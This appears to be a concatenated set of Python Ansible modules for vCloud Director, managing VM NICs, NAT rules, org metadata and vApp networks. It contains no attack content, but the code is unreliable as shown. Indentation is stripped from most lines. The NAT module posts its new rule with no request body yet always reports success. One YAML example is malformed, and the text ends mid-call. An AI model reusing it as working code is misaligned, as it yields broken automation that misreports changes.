uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
nic_indexs = [nic.NetworkConnectionIndex for nic in nics.NetworkConnection]
if nic_id not in nic_indexs:
response['warnings'] = 'NIC not found.'
return response
nic_to_update = nic_indexs.index(nic_id)
if network:
nics.NetworkConnection[nic_to_update].network = network
response['changed'] = True
if ip_allocation_mode:
allocation_mode_element = E.IpAddressAllocationMode(ip_allocation_mode)
nics.NetworkConnection[nic_to_update].IpAddressAllocationMode = allocation_mode_element
response['changed'] = True
if ip_address:
nics.NetworkConnection[nic_to_update].IpAddress = E.IpAddress(ip_address)
response['changed'] = True
if response['changed']:
update_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(update_nic_task)
            response['msg'] = 'update_nic: vApp VM nic has been updated.'
return response
def read_nics(self):
vm = self.get_vm()
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
meta = defaultdict(dict)
nic_id = str(nic.NetworkConnectionIndex)
meta['MACAddress'] = str(nic.MACAddress)
meta['IsConnected'] = str(nic.IsConnected)
meta['NetworkAdapterType'] = str(nic.NetworkAdapterType)
meta['NetworkConnectionIndex'] = str(nic.NetworkConnectionIndex)
meta['IpAddressAllocationMode'] = str(nic.IpAddressAllocationMode)
if hasattr(nic, 'IpAddress'):
meta['IpAddress'] = str(nic.IpAddress)
response['msg'][nic_id] = meta
return response
def delete_nic(self):
vm = self.get_vm()
nic_ids = self.params.get('nic_ids')
response = defaultdict(dict)
response['changed'] = False
uri = vm.resource.get('href') + '/networkConnectionSection'
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex in nic_ids:
nics.remove(nic)
nic_ids.remove(nic.NetworkConnectionIndex)
if len(nic_ids) > 0:
nic_ids = [str(nic_id) for nic_id in nic_ids]
err_msg = 'Can\'t find the specified VM nic(s) {0}'.format(','.join(nic_ids))
raise EntityNotFoundException(err_msg)
remove_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(remove_nic_task)
response['msg'] = 'VM nic(s) has been deleted.'
response['changed'] = True
return response
def main():
# org = "AIM"
# user = "cloud_robot_man_admin"
# password = "<PASSWORD>"
# host = "https://vcd.local.cloud.eve.vortice.eden/tenant/aim/"
# vm_name = "oz-router-01"
# vapp = "vZone_Sector_Network_Exchange_matreshka_zone_production_dc911rs"
# vdc = "lf-vx-z1e-vcd"
# network = "vZone_Sector_Network_Exchange_matreshka_routed_production_dc911rs"
# ip_allocation_mode = "DHCP"
# is_connected = True
# verify_ssl_certs = True
# api_version = '31.0'
# nic_id = "1"
# nic_ids = ["1", "0"]
# adapter_type = "E1000"
# state = "present"
# operation = "update"
argument_spec = vapp_vm_nic_argument_spec()
response = dict(
msg=dict(type='str')
)
module = VappVMNIC(argument_spec=argument_spec, supports_check_mode=True)
try:
        if module.params.get('state'):
            response = module.manage_states()
        elif module.params.get('operation'):
            response = module.manage_operations()
        else:
            raise Exception('One of the state/operation should be provided.')
except Exception as error:
response['msg'] = error
module.fail_json(**response)
module.exit_json(**response)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_nat_fw.py
```python
DOCUMENTATION = '''
---
module: vcd_nat_fw
short_description: Update Nat/FW in vcloud
'''
EXAMPLES = '''
- name: Add nat rule
vcd_nat_fw:
vcloud_url: 'https://vcloud-url-goes-here.somecompany.com'
username: 'vcloud_admin'
passwd: '<PASSWORD>'
ruletype: 'DNAT'
iface: 'vm-blah-blah-blah'
ifaceguid: '57fe4def-5328-4e27-91aa-b73700bffaa1'
origip: 172.16.0.6
origport: any
transip: 192.168.2.0/24
transport: any
proto: tcp
'''
from ansible.module_utils.basic import *
import xml.etree.ElementTree as ET
import requests
import time
def do_work(data):
vc_url = data["vcloud_url"]
vc_usr = data["username"]
vc_pwd = data["<PASSWORD>"]
vc_gw_name = data['gw_name']
ruletype = data['ruletype']
nattype = data['nattype']
iface = data['iface']
ifaceguid = data['ifaceguid']
origip = data['origip']
origport = data['origport']
transip = data['transip']
transport = data['transport']
proto = data['proto']
headers = {
"Accept": "application/*+xml;version=1.5",
"User-Agent": "Mozilla/5.0"
}
if vc_url.endswith('/'):
vc_url = vc_url[:-1]
r = requests.post(vc_url + "/api/sessions", auth=(vc_usr, vc_pwd), headers=headers)
if r.status_code == 200:
headers['x-vcloud-authorization'] = r.headers['x-vcloud-authorization']
headers['Accept'] = 'application/*+xml;version=5.1'
r = requests.get(vc_url + '/api/query?type=edgeGateway', auth=(vc_usr, vc_pwd), headers=headers)
if r.status_code == 200:
tree = ET.fromstring(r.content)
# Get all gateways
gw_list = tree.findall('{http://www.vmware.com/vcloud/v1.5}EdgeGatewayRecord')
gw_href = ''
for gw in gw_list:
if gw.attrib['name'] == vc_gw_name:
gw_href = gw.attrib['href']
# GET https://vcloud/api/admin/edgeGateway/guid
r = requests.get(gw_href, auth=(vc_usr, vc_pwd), headers=headers)
if r.status_code == 200:
tree = ET.fromstring(r.content)
cfgtop = tree.findall('{http://www.vmware.com/vcloud/v1.5}Configuration')[0]
servicecfg = cfgtop.findall('{http://www.vmware.com/vcloud/v1.5}EdgeGatewayServiceConfiguration')[0]
natservice = servicecfg.findall('{http://www.vmware.com/vcloud/v1.5}NatService')[0]
fwservice = servicecfg.findall('{http://www.vmware.com/vcloud/v1.5}FirewallService')[0]
if ruletype == 'NAT':
# NatRule
newrule = ET.Element('NatRule')
newruletype = ET.SubElement(newrule, 'RuleType')
newruletype.text = nattype
newenabled = ET.SubElement(newrule, 'IsEnabled')
newenabled.text = 'true'
newid = ET.SubElement(newrule, 'Id')
newid.text = ''
newgwnatrule = ET.SubElement(newrule, 'GatewayNatRule')
newiface = ET.SubElement(newgwnatrule, 'Interface')
                    newiface.attrib['href'] = vc_url + '/api/admin/network/' + ifaceguid
newiface.attrib['name'] = iface
newiface.attrib['type'] = 'application/vnd.vmware.admin.network+xml'
neworigip = ET.SubElement(newgwnatrule, 'OriginalIp')
neworigip.text = origip
neworigport = ET.SubElement(newgwnatrule, 'OriginalPort')
neworigport.text = origport
newtransip = ET.SubElement(newgwnatrule, 'TranslatedIp')
newtransip.text = transip
newtransport = ET.SubElement(newgwnatrule, 'TranslatedPort')
newtransport.text = transport
natservice.append(newrule)
#ET.dump(natservice)
headers["Content-Type"] = 'application/vnd.vmware.admin.edgeGatewayServiceConfiguration+xml'
r = requests.post(gw_href + '/action/configureServices', auth=(vc_usr, vc_pwd), headers=headers)
                elif ruletype == 'FW':
                    pass
    # main() unpacks do_work() as (is_error, has_changed, result), so return a
    # minimal tuple; fine-grained per-request error handling is left as-is.
    return False, True, {'ruletype': ruletype}
def main():
    fields = {
        "vcloud_url": {"required": True, "type": "str"},
        "username": {"required": True, "type": "str"},
        "passwd": {"required": True, "type": "str"},
        "gw_name": {"required": True, "type": "str"},
        "iface": {"required": True, "type": "str"},
        "ifaceguid": {"required": True, "type": "str"},
        "origip": {"required": True, "type": "str"},
        "origport": {"required": True, "type": "str"},
        "transip": {"required": True, "type": "str"},
        "transport": {"required": True, "type": "str"},
        "proto": {"required": True, "type": "str"},
        "ruletype": {
            "default": "NAT",
            "choices": ['NAT', 'FW'],
            "type": 'str'
        },
        "nattype": {
            "default": "SNAT",
            "choices": ['SNAT', 'DNAT'],
            "type": 'str'
        },
    }
module = AnsibleModule(argument_spec=fields)
is_error, has_changed, result = do_work(module.params)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error checking vm state", meta=result)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_org_metadata.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vcd_org_metadata
short_description: Manage org's states/operations in vCloud Director
version_added: "2.4"
description:
- Manage org's states/operations in vCloud Director
options:
user:
description:
- vCloud Director user name
required: false
password:
description:
- vCloud Director user password
required: false
host:
description:
- vCloud Director host address
required: false
org:
description:
- Organization name on vCloud Director to access
required: false
api_version:
description:
- Pyvcloud API version
required: false
verify_ssl_certs:
description:
- whether to use secure connection to vCloud Director host
required: false
org_name:
description:
- name of the org
required: true
full_name:
description:
- full name of the org
required: false
is_enabled:
description:
- enable organization if True. The default value is False
required: false
force:
description:
- force delete org
required: false
recursive:
description:
- recursive delete org
required: false
metadata:
description:
- dict to set, delete or update metadata
required: false
state:
        description:
            - state of org (present/absent/update)
            - One from state or operation has to be provided.
required: false
operation:
description:
- operation which should be performed over org
- One from state or operation has to be provided.
required: false
author:
- <EMAIL>
- <EMAIL>
- <EMAIL>
'''
EXAMPLES = '''
- name: "Set metadata of organization {{ org_name }}"
vcd_org_metadata:
user: XXXXXXXXXX
password: <PASSWORD>
host: XXXXXXXXXX
org: XXXXXXXXXX
org_name: "{{ org_name }}"
metadata:
- state: "present"
name: "keyX"
value: "valueY"
type: "STRING"
visibility: "READONLY"
#visibility: "READWRITE"
#visability: "PRIVATE"
operation: "set_metadata"
'''
RETURN = '''
msg: success/failure message corresponding to org state/operation
changed: true if resource has been changed else false
'''
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.system import System
from pyvcloud.vcd.client import EntityType, RelationType, ResourceType, MetadataDomain, MetadataVisibility, MetadataValueType
from pyvcloud.vcd.metadata import Metadata
from pyvcloud.vcd.utils import to_dict
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.exceptions import EntityNotFoundException, BadRequestException
VCD_ORG_STATES = ['present', 'absent', 'update']
VCD_ORG_OPERATIONS = ['read', 'add_rights', 'remove_rights', 'list_rights', 'list_roles', 'list_users', 'list_vdcs', 'set_metadata', 'get_metadata', 'get_metadata_key']
def org_argument_spec():
return dict(
org_name=dict(type='str', required=True),
full_name=dict(type='str', required=False),
is_enabled=dict(type='bool', required=False, default=False),
force=dict(type='bool', required=False, default=None),
recursive=dict(type='bool', required=False, default=None),
org_rights=dict(type='list', required=False),
        metadata=dict(type='list', required=False, default=[]),
state=dict(choices=VCD_ORG_STATES, required=False),
operation=dict(choices=VCD_ORG_OPERATIONS, required=False),
)
class VCDOrg(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VCDOrg, self).__init__(**kwargs)
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.create()
if state == "absent":
return self.delete()
if state == "update":
return self.update()
def manage_operations(self):
operation = self.params.get('operation')
if operation == "read":
return self.read()
if operation == "add_rights":
return self.add_rights()
if operation == "remove_rights":
return self.remove_rights()
if operation == "list_rights":
return self.list_rights()
if operation == "list_roles":
return self.list_roles()
if operation == "list_users":
return self.list_users()
if operation == "list_vdcs":
return self.list_vdcs()
if operation == "set_metadata":
return self.set_metadata()
if operation == "get_metadata":
return self.get_metadata()
if operation == "get_metadata_key":
return self.get_metadata_key()
def create(self):
org_name = self.params.get('org_name')
full_name = self.params.get('full_name')
is_enabled = self.params.get('is_enabled')
response = dict()
response['changed'] = False
try:
sys_admin = self.client.get_admin()
self.system = System(self.client, admin_resource=sys_admin)
self.system.create_org(org_name, full_name, is_enabled)
response['msg'] = 'Org {} has been created.'.format(org_name)
response['changed'] = True
except BadRequestException:
response['warnings'] = 'Org {} is already present.'.format(org_name)
return response
def read(self):
org_name = self.params.get('org_name')
response = dict()
org_details = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org_admin_resource = org.client.get_resource(org.href_admin)
org_details['org_name'] = org_name
org_details['full_name'] = str(org_admin_resource['FullName'])
org_details['is_enabled'] = str(org_admin_resource['IsEnabled'])
response['msg'] = org_details
return response
def update(self):
org_name = self.params.get('org_name')
is_enabled = self.params.get('is_enabled')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org.update_org(is_enabled)
response['msg'] = "Org {} has been updated.".format(org_name)
response['changed'] = True
return response
def delete(self):
org_name = self.params.get('org_name')
force = self.params.get('force')
recursive = self.params.get('recursive')
response = dict()
response['changed'] = False
try:
sys_admin = self.client.get_admin()
self.system = System(self.client, admin_resource=sys_admin)
delete_org_task = self.system.delete_org(org_name, force, recursive)
self.execute_task(delete_org_task)
response['msg'] = "Org {} has been deleted.".format(org_name)
response['changed'] = True
except EntityNotFoundException:
response['warnings'] = "Org {} is not present.".format(org_name)
return response
def add_rights(self):
org_name = self.params.get('org_name')
org_rights = self.params.get('org_rights')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org.add_rights(org_rights)
response['msg'] = "Rights has been added to org successfully."
response['changed'] = True
return response
def remove_rights(self):
org_name = self.params.get('org_name')
org_rights = self.params.get('org_rights')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org.remove_rights(org_rights)
response['msg'] = "Rights has been removed to org successfully."
response['changed'] = True
return response
def list_rights(self):
org_name = self.params.get('org_name')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
response['msg'] = org.list_rights_of_org()
return response
def list_roles(self):
org_name = self.params.get('org_name')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
response['msg'] = org.list_roles()
return response
def list_users(self):
org_name = self.params.get('org_name')
response = dict()
org_details = dict()
response['users'] = list()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org_user_list = org.list_users()
resource_type = ResourceType.USER.value
if self.client.is_sysadmin():
resource_type = ResourceType.ADMIN_USER.value
for org_user in org_user_list:
response['users'].append(
to_dict(org_user, resource_type=resource_type, exclude=[]))
return response
def list_vdcs(self):
org_name = self.params.get('org_name')
response = dict()
org_details = dict()
response['vdcs'] = list()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
response['vdcs'] = org.list_vdcs()
return response
    def get_metadata(self):
        org_name = self.params.get('org_name')
        response = dict()
        response['changed'] = False
        all_metadata = dict()
        # Same workaround as in set_metadata(): fetch the org's metadata
        # resource through the linked METADATA relation and walk its
        # MetadataEntry children (standard vCloud metadata schema).
        resource = self.client.get_linked_resource(self.client.get_org_by_name(org_name), RelationType.DOWN, EntityType.METADATA.value)
        if hasattr(resource, 'MetadataEntry'):
            for entry in resource.MetadataEntry:
                all_metadata[str(entry.Key)] = str(entry.TypedValue.Value)
        response['msg'] = all_metadata
        return response
    def get_metadata_key(self):
        # Convenience wrapper around get_metadata(): filter the result down
        # to the key names listed in the 'metadata' parameter, if any.
        metadata = self.params.get('metadata')
        response = self.get_metadata()
        wanted = [md['name'] for md in metadata if isinstance(md, dict) and 'name' in md]
        if wanted:
            response['msg'] = dict((k, v) for k, v in response['msg'].items() if k in wanted)
        return response
def set_metadata(self):
org_name = self.params.get('org_name')
metadata = self.params.get('metadata')
response = dict()
response['msg'] = ''
if len(metadata) != 0:
            # workaround: setting metadata on org/vdc objects is not yet
            # implemented in pyvcloud, so we talk to the linked metadata
            # resource directly; we will open an upstream pull request.
resource = self.client.get_linked_resource(self.client.get_org_by_name(org_name), RelationType.DOWN, EntityType.METADATA.value)
self.metadata = Metadata(self.client, resource=resource)
for md in metadata:
domain = MetadataDomain.SYSTEM
visibility = MetadataVisibility.READONLY
if type(md) is dict and md.get('state', 'present') == 'absent':
if md.get('visibility', 'READONLY').upper() == 'READWRITE':
domain = MetadataDomain.GENERAL
self.metadata.remove_metadata(md['name'], domain)
else:
if md.get('visibility', 'READONLY').upper() == 'PRIVATE':
visibility = MetadataVisibility.PRIVATE
elif md.get('visibility', 'READONLY').upper() == 'READWRITE':
domain = MetadataDomain.GENERAL
visibility = MetadataVisibility.READWRITE
value_type = MetadataValueType.STRING
if md.get('type', 'STRING').upper() == 'NUMBER':
value_type = MetadataValueType.NUMBER
elif md.get('type', 'STRING').upper() == 'BOOLEAN':
value_type = MetadataValueType.BOOLEAN
elif md.get('type', 'STRING').upper() == 'DATA_TIME':
value_type = MetadataValueType.DATA_TIME
self.metadata.set_metadata(md['name'], md['value'], domain, visibility, value_type, True)
return response
def main():
argument_spec = org_argument_spec()
response = dict(msg=dict(type='str'))
module = VCDOrg(argument_spec=argument_spec, supports_check_mode=True)
try:
if module.check_mode:
response = dict()
response['changed'] = False
response['msg'] = "skipped, running in check mode"
response['skipped'] = True
elif module.params.get('state'):
response = module.manage_states()
elif module.params.get('operation'):
response = module.manage_operations()
else:
raise Exception('Please provide state/operation for resource')
except Exception as error:
response['msg'] = error
module.fail_json(**response)
else:
module.exit_json(**response)
if __name__ == '__main__':
main()
```
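
The `set_metadata()` method above maps the loosely-typed entries of the `metadata` parameter onto pyvcloud's enums. Pulled out as a standalone sketch (the function name is ours; the enum members are the ones imported above):

```python
from pyvcloud.vcd.client import (MetadataDomain, MetadataValueType,
                                 MetadataVisibility)

def resolve_metadata_options(md):
    # READONLY entries live in the SYSTEM domain, READWRITE in GENERAL,
    # mirroring the branches inside set_metadata().
    domain, visibility = MetadataDomain.SYSTEM, MetadataVisibility.READONLY
    vis = md.get('visibility', 'READONLY').upper()
    if vis == 'PRIVATE':
        visibility = MetadataVisibility.PRIVATE
    elif vis == 'READWRITE':
        domain, visibility = MetadataDomain.GENERAL, MetadataVisibility.READWRITE
    value_type = getattr(MetadataValueType, md.get('type', 'STRING').upper(),
                         MetadataValueType.STRING)
    return domain, visibility, value_type
```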
#### File: ansible/modules/vcd_universal.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vcd_universal
short_description: Ansible Module to manage (create/delete) Networks in vApps in vCloud Director.
version_added: "2.4"
description:
- "Ansible Module to manage (create/delete) Networks in vApps."
options:
user:
description:
- vCloud Director user name
required: false
password:
description:
- vCloud Director user password
required: false
host:
description:
- vCloud Director host address
required: false
org:
description:
- Organization name on vCloud Director to access
required: false
api_version:
description:
- Pyvcloud API version
required: false
verify_ssl_certs:
description:
- whether to use secure connection to vCloud Director host
required: false
network:
description:
- Network name
required: true
vapp:
description:
- vApp name
required: true
vdc:
description:
- VDC name
required: true
fence_mode:
description:
- Network fence mode
required: false
parent_network:
description:
- VDC parent network to connect to
required: false
ip_scope:
description:
            - IP scope when no parent_network is defined
        required: false
state:
description:
- state of network ('present'/'absent').
required: true
author:
- <EMAIL>
'''
EXAMPLES = '''
- name: Manage a vApp network
vcd_universal:
user: ""
password: ""
host: ""
org: ""
api_version: ""
verify_ssl_certs: true
network: ""
vapp: ""
vdc: ""
fence_mode: ""
parent_network:
ip_scope: ""
state: "read"
- name: Test with a message
vcd_universal:
user: terraform
password: <PASSWORD>
host: csa.sandbox.org
org: Terraform
api_version: 30
verify_ssl_certs: False
network = "uplink"
vapp = "vapp1"
vdc = "vdc1"
state = "present"
'''
RETURN = '''
msg: success/failure message corresponding to vapp network state
changed: true if resource has been changed else false
'''
from lxml import etree
from ipaddress import ip_network
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.vdc import VDC
from pyvcloud.vcd.vapp import VApp
from pyvcloud.vcd.client import NSMAP
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import E_OVF
from pyvcloud.vcd.client import ApiVersion
from pyvcloud.vcd.client import EdgeGatewayType
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import FenceMode
from pyvcloud.vcd.client import find_link
from pyvcloud.vcd.client import GatewayBackingConfigType
from pyvcloud.vcd.client import LogicalNetworkLinkType
from pyvcloud.vcd.client import MetadataDomain
from pyvcloud.vcd.client import MetadataValueType
from pyvcloud.vcd.client import MetadataVisibility
from pyvcloud.vcd.client import QueryResultFormat
from pyvcloud.vcd.client import RelationType
from pyvcloud.vcd.client import ResourceType
from pyvcloud.vcd.client import SIZE_1MB
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.exceptions import EntityNotFoundException
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.exceptions import MultipleRecordsException
from pyvcloud.vcd.exceptions import OperationNotSupportedException
VAPP_VM_STATES = ['present', 'absent', 'read']
VAPP_VM_OPERATIONS = ['poweron', 'poweroff', 'deploy', 'undeploy', 'list_vms', 'list_networks']
VM_STATUSES = {'3': 'SUSPENDED', '4': 'POWERED_ON', '8': 'POWERED_OFF'}
VAPP_NETWORK_STATES = ['present', 'update', 'absent', 'read']
VAPP_NETWORK_OPERATIONS = ['read']
VAPP_TARGET_OBJECT = ['vapp', 'edge', 'vm', 'firewall']
def vapp_argument_spec():
return dict(
vapp_name=dict(type='str', required=True),
template_name=dict(type='str', required=False),
catalog_name=dict(type='str', required=False),
vdc=dict(type='str', required=True),
description=dict(type='str', required=False, default=None),
network=dict(type='str', required=False, default=None),
fence_mode=dict(
type='str', required=False, default=FenceMode.BRIDGED.value),
ip_allocation_mode=dict(type='str', required=False, default="dhcp"),
deploy=dict(type='bool', required=False, default=True),
power_on=dict(type='bool', required=False, default=True),
accept_all_eulas=dict(type='bool', required=False, default=False),
memory=dict(type='int', required=False, default=None),
cpu=dict(type='int', required=False, default=None),
disk_size=dict(type='int', required=False, default=None),
vmpassword=dict(type='str', required=False, default=None),
cust_script=dict(type='str', required=False, default=None),
vm_name=dict(type='str', required=False, default=None),
hostname=dict(type='str', required=False, default=None),
ip_address=dict(type='str', required=False, default=None),
storage_profile=dict(type='str', required=False, default=None),
network_adapter_type=dict(type='str', required=False, default=None),
force=dict(type='bool', required=False, default=False),
state=dict(choices=VAPP_VM_STATES, required=False),
operation=dict(choices=VAPP_VM_OPERATIONS, required=False),
target=dict(choices=VAPP_TARGET_OBJECT, required=True)
)
def vapp_merge_argument_spec():
return dict(
vapp_name=dict(type='str', required=True),
template_name=dict(type='str', required=False),
catalog_name=dict(type='str', required=False),
vdc=dict(type='str', required=True),
description=dict(type='str', required=False, default=None),
network=dict(type='str', required=False, default=None),
fence_mode=dict(type='str', required=False, default=FenceMode.BRIDGED.value),
ip_allocation_mode=dict(type='str', required=False, default="dhcp"),
deploy=dict(type='bool', required=False, default=True),
power_on=dict(type='bool', required=False, default=True),
accept_all_eulas=dict(type='bool', required=False, default=False),
memory=dict(type='int', required=False, default=None),
cpu=dict(type='int', required=False, default=None),
disk_size=dict(type='int', required=False, default=None),
vmpassword=dict(type='str', required=False, default=None),
cust_script=dict(type='str', required=False, default=None),
vm_name=dict(type='str', required=False, default=None),
hostname=dict(type='str', required=False, default=None),
ip_address=dict(type='str', required=False, default=None),
parent_network=dict(type='str', required=False, default=None),
storage_profile=dict(type='str', required=False, default=None),
network_adapter_type=dict(type='str', required=False, default=None),
force=dict(type='bool', required=False, default=False),
state=dict(choices=VAPP_VM_STATES, required=False),
ip_scope=dict(type='str', required=False, default=None),
operation=dict(choices=VAPP_VM_OPERATIONS, required=False),
target=dict(choices=VAPP_TARGET_OBJECT, required=False),
)
def vapp_network_argument_spec():
return dict(
network=dict(type='str', required=True),
vapp=dict(type='str', required=True),
vdc=dict(type='str', required=True),
fence_mode=dict(type='str', required=False, default=FenceMode.BRIDGED.value),
parent_network=dict(type='str', required=False, default=None),
ip_scope=dict(type='str', required=False, default=None),
state=dict(choices=VAPP_NETWORK_STATES, required=True),
)
class VappNetwork(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VappNetwork, self).__init__(**kwargs)
vapp_resource = self.get_resource()
self.vapp = VApp(self.client, resource=vapp_resource)
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.add_network()
if state == "absent":
return self.delete_network()
if state == "update":
return self.update_network()
if state == "read":
return self.read_network()
def get_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vapp_resource
def get_org_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return org_resource
def get_vdc_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vdc_resource
def get_network(self):
network_name = self.params.get('network')
networks = self.vapp.get_all_networks()
for network in networks:
if network.get('{'+NSMAP['ovf']+'}name') == network_name:
return network
raise EntityNotFoundException('Can\'t find the specified vApp network')
    def read_network(self):
        network_name = self.params.get('network')
        response = dict()
        response['changed'] = False
        # get_network() reads the network name from self.params and raises
        # EntityNotFoundException when the network is missing; the lxml
        # element itself is not serializable, so only report its name.
        network = self.get_network()
        response['msg'] = {'network': network.get('{' + NSMAP['ovf'] + '}name')}
        return response
    def update_network(self):
        network_name = self.params.get('network')
        response = dict()
        response['changed'] = False
        # In-place update of a vApp network is not implemented here; the
        # lookup below at least validates that the network exists. Use
        # state=absent followed by state=present to change its configuration.
        self.get_network()
        response['warnings'] = 'Vapp Network {} exists; in-place update is not implemented.'.format(network_name)
        return response
def delete_network(self):
network_name = self.params.get('network')
response = dict()
response['changed'] = False
try:
self.get_network()
except EntityNotFoundException:
response['warnings'] = 'Vapp Network {} is not present.'.format(network_name)
else:
network_config_section = self.vapp.resource.NetworkConfigSection
for network_config in network_config_section.NetworkConfig:
if network_config.get('networkName') == network_name:
network_config_section.remove(network_config)
delete_network_task = self.client.put_linked_resource(
self.vapp.resource.NetworkConfigSection, RelationType.EDIT,
EntityType.NETWORK_CONFIG_SECTION.value,
network_config_section)
self.execute_task(delete_network_task)
response['msg'] = 'Vapp Network {} has been deleted.'.format(network_name)
response['changed'] = True
return response
def add_network(self):
network_name = self.params.get('network')
fence_mode = self.params.get('fence_mode')
parent_network = self.params.get('parent_network')
ip_scope = self.params.get('ip_scope')
response = dict()
response['changed'] = False
try:
self.get_network()
except EntityNotFoundException:
network_config_section = self.vapp.resource.NetworkConfigSection
config = E.Configuration()
if parent_network:
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
orgvdc_networks = vdc_resource.list_orgvdc_network_resources(parent_network)
parent = next((network for network in orgvdc_networks if network.get('name') == parent_network), None)
if parent:
config.append(E.ParentNetwork(href=parent.get('href')))
else:
                    raise EntityNotFoundException('Parent network {0} does not exist'.format(parent_network))
elif ip_scope:
scope = E.IpScope(
E.IsInherited('false'),
E.Gateway(str(ip_network(ip_scope, strict=False).network_address+1)),
E.Netmask(str(ip_network(ip_scope, strict=False).netmask)))
config.append(E.IpScopes(scope))
else:
                # VappNetworkCreateError was never defined; the imported
                # InvalidParameterException fits this validation failure.
                raise InvalidParameterException('Either parent_network or ip_scope must be set')
config.append(E.FenceMode(fence_mode))
network_config = E.NetworkConfig(config, networkName=network_name)
network_config_section.append(network_config)
add_network_task = self.client.put_linked_resource(
self.vapp.resource.NetworkConfigSection, RelationType.EDIT,
EntityType.NETWORK_CONFIG_SECTION.value,
network_config_section)
self.execute_task(add_network_task)
response['msg'] = 'Vapp Network {} has been added'.format(network_name)
response['changed'] = True
else:
response['warnings'] = 'Vapp Network {} is already present.'.format(network_name)
return response
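# Quick sanity check of the ip_scope gateway/netmask derivation used in
# add_network() above (illustrative; "10.0.0.0/24" yields gateway 10.0.0.1):
#
#   >>> from ipaddress import ip_network
#   >>> str(ip_network(u'10.0.0.0/24', strict=False).network_address + 1)
#   '10.0.0.1'
#   >>> str(ip_network(u'10.0.0.0/24', strict=False).netmask)
#   '255.255.255.0'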
class Vapp(VcdAnsibleModule):
def __init__(self, **kwargs):
super(Vapp, self).__init__(**kwargs)
logged_in_org = self.client.get_org()
self.org = Org(self.client, resource=logged_in_org)
vdc_resource = self.org.get_vdc(self.params.get('vdc'))
self.vdc = VDC(self.client, href=vdc_resource.get('href'))
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.create()
if state == "absent":
return self.delete()
    def manage_operations(self):
        operation = self.params.get('operation')
        if operation == "poweron":
            return self.power_on()
        if operation == "poweroff":
            return self.power_off()
        if operation == "deploy":
            return self.deploy()
        if operation == "undeploy":
            return self.undeploy()
        if operation == "list_vms":
            return self.list_vms()
        if operation == "list_networks":
            return self.list_networks()
def get_vapp(self):
vapp_name = self.params.get('vapp_name')
vapp_resource = self.vdc.get_vapp(vapp_name)
return VApp(self.client, name=vapp_name, resource=vapp_resource)
def instantiate(self):
params = self.params
vapp_name = params.get('vapp_name')
catalog_name = params.get('catalog_name')
template_name = params.get('template_name')
description = params.get('description')
network = params.get('network')
fence_mode = params.get('fence_mode')
ip_allocation_mode = params.get('ip_allocation_mode')
deploy = params.get('deploy')
power_on = params.get('power_on')
accept_all_eulas = params.get('accept_all_eulas')
memory = params.get('memory')
cpu = params.get('cpu')
disk_size = params.get('disk_size')
vmpassword = params.get('vmpassword')
cust_script = params.get('cust_script')
vm_name = params.get('vm_name')
hostname = params.get('hostname')
ip_address = params.get('ip_address')
storage_profile = params.get('storage_profile')
network_adapter_type = params.get('network_adapter_type')
response = dict()
response['changed'] = False
try:
self.vdc.get_vapp(vapp_name)
except EntityNotFoundException:
create_vapp_task = self.vdc.instantiate_vapp(
name=vapp_name,
catalog=catalog_name,
template=template_name,
description=description,
network=network,
